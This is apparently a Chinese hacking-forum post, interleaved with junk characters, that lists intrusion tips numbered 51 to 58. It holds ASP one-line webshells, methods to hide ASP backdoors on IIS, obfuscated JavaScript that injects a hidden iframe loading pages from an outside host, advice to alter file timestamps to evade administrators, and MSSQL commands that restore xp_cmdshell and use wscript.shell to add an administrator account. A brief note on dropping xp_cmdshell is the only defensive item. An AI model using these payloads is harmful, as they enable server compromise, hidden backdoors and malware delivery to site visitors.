+ X3 H/ x2 k: F* M0 ]9 L4 b
51、log备份时的一句话木马:  \1 ?9 u4 P9 ]
a).<%%25Execute(request("go"))%%25>
6 ~- r3 P& S9 z8 Yb).<%Execute(request("go"))%>. T4 g9 Y$ [2 C$ x
c).%><%execute request("go")%><%/ F1 M; A0 r; g2 i1 B9 P( d' }, I/ V
d).<script language=VBScript runat=server>execute request("sb")</Script>8 @/ Y/ b% E0 V# S/ }
e).<%25Execute(request("l"))%25>2 N  H8 g& l% r$ e
f).<%if request("cmd")<>"" then execute request("pass")%>% F& e! s' V* r0 U/ h: i/ d. P

+ }" F, D" j' O7 m- Q2 \' S52、at "12:17" /interactive cmd
9 a, Y% N4 @* h+ ?执行后可以用AT命令查看新加的任务
! }$ ^# v) f1 J1 A用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。& K. J- P3 ?& Q
, @9 L; N6 ~% Q+ V
53、隐藏ASP后门的两种方法
( j$ N/ {7 W3 \6 w- y) s5 v8 q- c1、建立非标准目录:mkdir images..\2 |% Y/ S( c1 f3 b7 M: T
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
$ J2 W2 \4 U+ H' L5 [通过web访问ASP木马:http://ip/images../news.asp?action=login3 h  j5 X* J- q+ `9 _. a
如何删除非标准目录:rmdir images..\ /s5 C) N& I& E3 Z, R4 f" A. A- l* O
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:! w8 }+ }5 Y! i$ i$ w
mkdir programme.asp
4 }. X, f; c; U* ?( X6 g新建1.txt文件内容:<!--#include file=”12.jpg”-->4 d) `" h* N2 T5 [# w/ m0 f
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件- O6 n" S4 s, d! T9 M0 C
attrib +H +S programme.asp
. \6 Q2 R7 G: S% x: E0 B8 p8 H) n( ]0 |通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt9 R3 I/ Y7 i) D, r% d3 \! p( C4 ^

2 c& E% d0 i: d: y54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
9 m: N- ?% ?6 B. B然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
6 F" |0 y, S$ j) \! S5 d) v* H! k. `, i. k
55、JS隐蔽挂马
2 _- ~8 j" _' C" j. M1.
! O8 |4 |. y- Yvar tr4c3="<iframe src=ht";
* o+ r$ i, C7 {/ T& N1 h0 r: F# itr4c3 = tr4c3+"tp:/";
2 t, h0 o" c' t) Z% j+ }tr4c3 = tr4c3+"/ww";
" s+ f" M3 \8 w, p; F9 Ntr4c3 = tr4c3+"w.tr4";
' T- H5 k0 O) `1 P) Y& p9 itr4c3 = tr4c3+"c3.com/inc/m";
- [5 }! i0 P4 a2 p( otr4c3 = tr4c3+"m.htm style="display:none"></i";, J% E9 c7 S& q/ `
tr4c3 =tr4c3+"frame>'";; c# @& [4 l4 R1 W
document.write(tr4c3);5 a& r4 H7 ~/ p7 x; A( {3 b, L
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
  Y' s) p# G$ v- [9 ]% U4 f9 q' B
0 p# r* N' \5 e: ^6 D2.$ u& D6 ^- O+ ?  p
转换进制,然后用EVAL执行。如
; b& q4 |2 Z8 p8 o  A! m0 i- q8 Veval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");0 c. _3 v! b% w4 A; M; M
不过这个有点显眼。
: Y# |. y% U/ R3.. w, n" z% l1 x5 i6 U% B; h* U% m- b
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
, ^8 z1 p8 ?0 k5 ^! }最后一点,别忘了把文件的时间也修改下。1 F( w0 V( J) e6 t4 T/ O

) C; W4 S9 i! g9 U9 W+ r4 W* z56.3389终端入侵常用DOS命令" s! C. m+ _! i9 d
taskkill taskkill /PID 1248 /t
) F  k9 m6 q5 ]3 w  `8 R8 F- G  [
" w0 Q4 O  X* \" m" dtasklist 查进程3 @. D% X" p" T2 v, F8 F  [
$ W$ L8 S: J0 w( N3 J
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限' T3 }$ U+ A" R5 E* A7 f. k
iisreset /reboot
2 H5 E8 G1 p8 |7 w; Z+ }tsshutdn /reboot /delay:1    重起服务器& a! V9 F7 }. O, A9 }
) t; l% n: f& s$ B
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,2 x( E2 I- r+ S; l
* v) o* H! D" e% e* u1 y
query user 查看当前终端用户在线情况
/ W& D5 c3 A6 L4 q7 m4 [! w
( P7 V1 I8 [( h# D要显示有关所有会话使用的进程的信息,请键入:query process *
" E1 ?  H3 w, M- l6 g
( A( Q: z; ?0 S要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
$ `* w; o" l, _, x& F/ w6 Q
) G. V( h9 v9 z; o8 G) e6 \- `2 y要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
- m& I$ C1 F% |( U$ [/ v  J
! t6 L/ t' d+ |9 q4 S要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
0 {% U6 h7 o' k5 b
3 {6 n1 p- Y% I8 b9 H$ Q+ R命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启/ {8 H! S, H4 ]. J5 A* O1 i% j

" J" L$ ]" S) P  @, F2 k; z! `/ R命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统1 S; m' u/ J7 k. p+ I& _2 x' v
: {- H6 l% \* _, C) [- m# Q
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。( W; ^( I5 b- d/ D) @/ O7 X$ N

. j" [# A1 k/ h) @6 j命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
$ L! Y7 M9 ?+ [- Q) e- d2 [  p; y4 A. b# {" ^1 M% X2 i, c
56、在地址栏或按Ctrl+O,输入:
6 l* c1 N6 w+ Ajavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
- ^5 v. U4 h  V+ n9 f. [: G6 B8 J$ ]  f: u+ M+ V
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
' `7 D8 o2 t" B! }3 F6 x' q
/ d; j2 a3 a. @+ ?57、net user的时候,是不能显示加$的用户,但是如果不处理的话,6 ~2 h9 A: t8 R6 E  m% |! C8 d
用net localgroup administrators是可以看到管理组下,加了$的用户的。, C% v6 c" i( m4 S' P

( \% x0 z/ F5 V& d" A( O58、 sa弱口令相关命令
4 @9 B2 z6 ]8 O+ o$ a# y6 z2 V+ U$ _1 b, e4 s& u' F& X8 K+ w
一.更改sa口令方法:  F2 s: z' N+ c2 {- _8 f4 m
用sql综合利用工具连接后,执行命令:' G% J/ m& \2 J6 M' A
exec sp_password NULL,'20001001','sa'
( F+ W7 k/ A* f& R' [(提示:慎用!): t" T" K$ {% S

+ F. a; U2 R4 {2 @# B二.简单修补sa弱口令.
1 A7 K. s4 N: _5 G
% R+ n* G4 Y& ^! U9 C' N7 N方法1:查询分离器连接后执行:
  h5 n1 F$ c' y+ Yif exists (select * from7 B6 k7 }0 {* }  y) G: \' Q1 X( a
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- l0 K! E, v2 K7 I
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)4 H4 K  n7 M$ }' v# M0 i
; M: e. B$ j. U/ |! ~
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'% R- H: b! e5 I* O4 u
* ?+ ~6 Q6 G6 k* V' V
GO
4 N8 n* A: f6 }4 @+ W0 U* D; K3 T; o# v; k. d- c3 o, p
然后按F5键命令执行完毕
7 w, h; E) y6 e9 u. C& ^! c& e2 j& C6 \% e* N- [' D0 P: c
方法2:查询分离器连接后
& O& s6 P; p1 U$ q" M' v) [第一步执行:use master# M2 H! D6 I# A- w& k5 ^% D2 \: |
第二步执行:sp_dropextendedproc 'xp_cmdshell'
4 }7 [9 q! j7 j1 D1 t3 A然后按F5键命令执行完毕
* E7 ]4 g# t- j" B# M
5 X# J3 N0 R" V! T" w0 F5 |' P0 }8 x  [! L  K
三.常见情况恢复执行xp_cmdshell.$ J+ E: x: t# ?, O

. m$ q6 W- D# |! k* c/ z" b  I) R5 J+ }+ c
1 未能找到存储过程'master..xpcmdshell'.7 h9 V( ?  O) l1 h  w* O! `
   恢复方法:查询分离器连接后,
' M9 I1 R; V; n" F5 b  d第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
  k1 d9 s* F/ L4 X1 p第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
. L1 E: J7 |7 `: m4 L2 ^) R, H然后按F5键命令执行完毕* H- Y) [  C6 {, G% {' I
4 y1 f- X: {: x% G: ^) B
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)4 @! z# o" O8 d$ X) h6 B2 \- D
恢复方法:查询分离器连接后,6 {! [4 l' |& k; n
第一步执行:sp_dropextendedproc "xp_cmdshell"
9 y1 O$ ~, L( b3 J( V( d第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( S$ S8 B; m# g* @0 ?
然后按F5键命令执行完毕
% @5 a- q$ M  D' Z. l0 ^
% U0 }6 L2 P9 g. D- ^$ o4 ]3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
; `$ i1 Q& K0 x7 b* ^) ]1 [恢复方法:查询分离器连接后,
( I: Q2 r/ M% C- I3 Z第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 d1 r& i3 w. q3 O/ Y& k- H第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           ) C- P3 r$ O& m/ O2 h& A1 y- q
然后按F5键命令执行完毕. i2 P) J  [$ R5 t; `

  A3 ~& C" {) i7 L8 }5 r7 W- H' H) |四.终极方法.' j7 c' e" i# x+ s" b) @2 R
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:* z' f! H8 T0 ~1 n/ q
查询分离器连接后,; Q; R' w0 Z1 y" Z/ p6 C
2000servser系统:3 [/ [( A- p" V0 x6 L8 c& F7 E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'! c9 y% ]' z" U4 ^) O# ]. O  M

0 l" L' ?& V& z! p  z, Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 s( x  J7 F  L4 f! T! d3 B# j% C. q* B2 R" k4 l% O9 J4 [. n$ W9 [
xp或2003server系统:
0 I2 R6 w/ r2 N7 H) a9 a% f
* d1 P- N# q0 }$ rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
* B$ u* D# w, ~
. z" @/ n7 u$ j5 g. b* ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 a4 k, k' p7 r5 z1 v8 q9 a" I# [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表